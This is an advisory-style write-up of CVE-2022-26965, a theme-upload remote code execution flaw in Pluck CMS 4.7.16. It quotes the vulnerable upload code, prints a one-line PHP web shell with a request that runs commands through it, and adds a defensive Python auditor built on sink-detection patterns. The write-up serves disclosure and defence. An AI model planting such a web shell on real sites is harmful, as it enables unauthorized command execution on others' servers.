Overview

A newly discovered vulnerability (CVE-2022-26965) in Pluck 4.7.16 highlights a potential risk for websites utilizing this content management system (CMS). Specifically, an admin user can perform remote code execution (RCE) by utilizing the theme upload functionality, which is found at /admin.php?action=themeinstall. In this article, we will provide a detailed analysis of the vulnerability, including code snippets, original references, and exploit details, ensuring readers understand the severity of this finding and, more importantly, how to mitigate its risks.

Pluck (CMS) Background

Pluck is an open-source CMS designed for small and medium-sized websites, focusing on simplicity and ease of use. It allows users to create and manage web pages, blogs, images, and more without the need for programming knowledge. However, as with any software, vulnerabilities can sometimes exist that threaten its security and the information stored within.

Vulnerability Details

The RCE vulnerability in Pluck 4.7.16 lies in the theme upload functionality provided at the path /admin.php?action=themeinstall. When uploading a theme, an admin user can include PHP code within the template files, which can then be executed remotely, leading to unauthorized access to the system and potentially severe consequences.

The vulnerability exists within the following code segment in admin.php:

if (isset($_POST['submit'])) {
    // Only the last 13 characters of the client-supplied filename are inspected
    // ('.theme.tar.gz' is 13 characters long); the archive contents are never checked.
    $extension = substr($_FILES['userfile']['name'], -13);
    if ($extension !== '.theme.tar.gz') {
        exit('<p><span class="kop2">'.lang('themes_install_error1', false).'</span><br /><a href="?action=themeinstall">'.lang('back').'</a></p>');
    }

    // The upload is stored under a timestamped name and then unpacked as-is.
    $filename = 'data/settings/themes/'.time().'.theme.tar.gz';
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $filename)) {
        // theme_upload() extracts the theme and places its files in the appropriate locations
        theme_upload($filename);
    } else {
        exit('<p><span class="kop2">'.lang('themes_install_error2', false).'</span><br /><a href="?action=themeinstall">'.lang('back').'</a></p>');
    }
}

The check for the '.theme.tar.gz' extension is insufficient: it only inspects the trailing characters of the client-supplied filename, and nothing inspects the contents of the archive before theme_upload() extracts it. An attacker can therefore satisfy the check with any archive whose name ends in '.theme.tar.gz' and have a PHP file containing malicious code extracted onto the server.

Exploit

If an attacker has admin access to the Pluck CMS, they can exploit the RCE vulnerability by placing a malicious PHP file in an archive whose name ends in '.theme.tar.gz' and uploading it through the theme install feature. The file can contain any PHP code the attacker needs to execute on the server.

For example, an attacker could create a PHP file named 'exploit.php' containing the following code:

<?php
    system($_GET['cmd']);
?>

By including this file in their custom '.theme.tar.gz' package, they can then utilize the theme upload feature to embed this file into the system's directories. Finally, the attacker can perform RCE by directing their browser to the malicious PHP file with an appended command. For instance, they might request http(s)://<target-domain>/exploit.php?cmd=whoami to execute the 'whoami' command on the targeted system.

Mitigation

To mitigate the risk of this RCE vulnerability, Pluck users should restrict access to the admin area of their CMS and make sure to use strong, unique credentials. Additionally, users can sanitize and validate any input provided through the theme upload functionality to ensure it meets expected parameters.

Developers should implement proper extension validation checks and adopt content-level security measures, that is, inspect what an uploaded archive contains before extracting it rather than trusting its filename. This will significantly reduce the chances of successful exploits and help secure the platform against similar vulnerabilities in the future.
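The following is an added example, not code from Pluck or from this advisory, showing the content-level check that the filename-suffix test above lacks. It audits a theme archive before anything is extracted: it rejects members with absolute or traversing paths and link entries, and flags PHP files in which an OS-command or eval sink is fed from request data (the pattern of the 'exploit.php' web shell shown above). Because Pluck themes legitimately contain PHP template files, it does not reject PHP outright. The sink list, the superglobal list and the sample archives are constructed here and are assumptions, not Pluck's own rules; only the Python standard library is used.

```python
"""Pre-install audit of a Pluck-style '.theme.tar.gz' archive (added example)."""
from __future__ import annotations

import io
import re
import tarfile

# Heuristic (assumption): PHP functions that hand a string to the OS or to eval.
SINK_RE = re.compile(
    rb"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Heuristic (assumption): request-controlled data sources.
REQUEST_RE = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def audit_theme_archive(data: bytes, filename: str = "upload.theme.tar.gz",
                        expected_suffix: str = ".theme.tar.gz") -> list[str]:
    """Return a list of findings for the archive bytes; empty means nothing was found."""
    findings: list[str] = []
    # The suffix check mirrors Pluck's own test; it is necessary but not sufficient.
    if not filename.endswith(expected_suffix):
        findings.append(f"filename {filename!r} lacks suffix {expected_suffix!r}")
    try:
        tar = tarfile.open(fileobj=io.BytesIO(data), mode="r:gz")
    except (tarfile.TarError, OSError) as exc:
        return findings + [f"not a valid gzip tar archive: {exc}"]
    with tar:
        for member in tar.getmembers():
            name = member.name
            # Absolute or traversing paths would extract outside the themes directory.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append(f"unsafe member path: {name}")
                continue
            # Symlinks/hardlinks can point extraction at arbitrary files.
            if member.issym() or member.islnk():
                findings.append(f"link member not allowed: {name} -> {member.linkname}")
                continue
            if not member.isfile():
                continue
            # Inspect PHP members for a request-controlled command/eval sink.
            if PHP_EXT_RE.search(name):
                body = tar.extractfile(member).read()
                if SINK_RE.search(body) and REQUEST_RE.search(body):
                    findings.append(f"request-controlled command/eval sink in {name}")
    return findings


def build_archive(files: dict[str, bytes]) -> bytes:
    """Constructed sample helper: pack an in-memory path->content map as tar.gz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed samples: a benign theme, one carrying the web shell from the
# write-up, and one whose member path escapes the themes directory.
BENIGN_THEME = build_archive({
    "mytheme/info.php": b"<?php $theme_name = 'mytheme'; ?>",
    "mytheme/theme.php": b"<html><body><?php theme_content(); ?></body></html>",
    "mytheme/style.css": b"body { margin: 0; }",
})
SHELL_THEME = build_archive({
    "mytheme/theme.php": b"<html><?php theme_content(); ?></html>",
    "mytheme/exploit.php": b"<?php system($_GET['cmd']); ?>",
})
TRAVERSAL_THEME = build_archive({
    "../../exploit.php": b"<?php echo 'placeholder'; ?>",
})

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_THEME), ("shell", SHELL_THEME),
                        ("traversal", TRAVERSAL_THEME)]:
        print(label, audit_theme_archive(blob) or "OK")
```

Run it as a script to see the three verdicts, or call audit_theme_archive() on the bytes of an uploaded file before handing the archive to the extraction step. The sink heuristic is deliberately narrow to avoid rejecting ordinary templates; it complements, rather than replaces, restricting admin access and requiring strong credentials as described above.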

References

- NVD - CVE-2022-26965
- Pluck CMS Repository
- Pluck CMS Website

Conclusion

In conclusion, the CVE-2022-26965 vulnerability in Pluck 4.7.16 allows an admin user to perform RCE through the theme upload functionality. By understanding the nature of the vulnerability and taking appropriate steps to mitigate the risk, users can protect their websites and continue using Pluck CMS safely.

Timeline

Published on: 03/18/2022 07:15:00 UTC
Last modified on: 03/25/2022 17:54:00 UTC